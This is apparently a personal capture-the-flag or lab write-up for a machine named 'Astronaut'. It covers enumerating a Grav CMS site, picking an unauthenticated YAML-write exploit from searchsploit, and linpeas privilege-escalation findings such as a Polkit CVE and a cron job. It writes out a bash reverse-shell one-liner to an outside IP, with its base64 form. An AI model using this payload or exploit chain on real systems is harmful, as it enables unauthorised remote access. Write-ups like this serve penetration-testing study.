Astronaut - Writeup - Konstantinovitz

## Enum - 80/HTTP - website - 22/SSH I think I know what to do here :-)) ### 80/HTTP - Grav http://192.168.188.12/grav-admin/ ![[Pasted image 20250424125559.png]] From site docs: Fully flat file website using php. We run [[FFUF]] for directory enumeration: - http://192.168.188.12/grav-admin/login - http://192.168.188.12/grav-admin/admin Default creds? - None apparent from docs There seems to be a couple of CVE's for the system. Question is; which version are we dealing with? - wappalyzer is not specific - page source dosent seem to reveal much - based on the grav docs there's a limited range of versions: - `v1.7` - `v1.6` - `v1.5` - I've attempted to enumerate/fingerprint the CMS version in the following ways: - `404` page - Source code inspection - Headers inspection - Looking for copyright years - And prolly some more shit - Only thing I could have done further is pull images from the site and inspect EXIF dates, but that would have been too time consuming in an exam. There's a single CVE which does not require auth: ``` ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/astronaut]-[192.168.188.12] ╰─> searchsploit "grav cms" ----------------------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------------------- --------------------------------- Grav CMS 1.4.2 Admin Plugin - Cross-Site Scripting | php/webapps/42131.txt Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Si | php/webapps/49264.txt Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated | php/webapps/49961.py GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2) | php/webapps/49973.py GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit) | php/webapps/49788.rb gravy media CMS 1.07 - Multiple Vulnerabilities | php/webapps/8315.txt ----------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Papers: No Results ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/astronaut]-[192.168.188.12] ╰─> searchsploit -m 49973 Exploit: GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2) URL: https://www.exploit-db.com/exploits/49973 Path: /opt/exploitdb/exploits/php/webapps/49973.py Codes: N/A Verified: True File Type: ASCII text, with very long lines (429) Copied to: /targets/astronaut/49973.py ``` We generate a payload: ```sh echo -ne "/bin/bash -i >& /dev/tcp/192.168.45.231/445 0>&1" | base64 -w0 L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNDUuMjMxLzQ0NSAwPiYx ``` At this point I got stuck, lost patience and looked at a hint. Apparently I was doing it right and just had to wait a minute... Totally random that it was this CVE which turned out to be working, had no idea what version of "Grav" I was even dealing with... ## Privesc Linpeas reveals that the system has a 95% privesc vector: `CVE-2021-3560` which is Polkit? https://github.blog/security/vulnerability-research/privilege-escalation-polkit-root-on-linux-with-bug/ We also notice that `/etc/sshd_config` has ``` PermitRootLogin Yes PasswordAuthentication Yes ``` We also uncover this entry: ``` ╔══════════╣ Searching folders owned by me containing others files on it (limit 100) -rw-rw-r-- 1 root www-data 47 Apr 24 13:34 status.yaml total 4 ``` ``` /var/www/html/grav-admin/user/data/scheduler/status.yaml ``` Contains nothing of interest, but may be chained for some shit later. ``` ══╣ Possible private SSH keys were found! /etc/ImageMagick-6/mime.xml ``` ``` -rwxrwxr-- 1 www-data www-data 2161 Mar 17 2021 /var/www/html/grav-admin/webserver-configs/web.config ``` ``` ╔══════════╣ Users with console alex:x:1000:1000::/home/alex:/bin/bash root:x:0:0:root:/root:/bin/bash ``` Another 95% privesc vector: ``` ╔══════════╣ Cron jobs ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs /usr/bin/crontab * * * * * cd /var/www/html/grav-admin;/usr/bin/php bin/grav scheduler 1>> /dev/null 2>&1 ``` ## Lessons Learned ...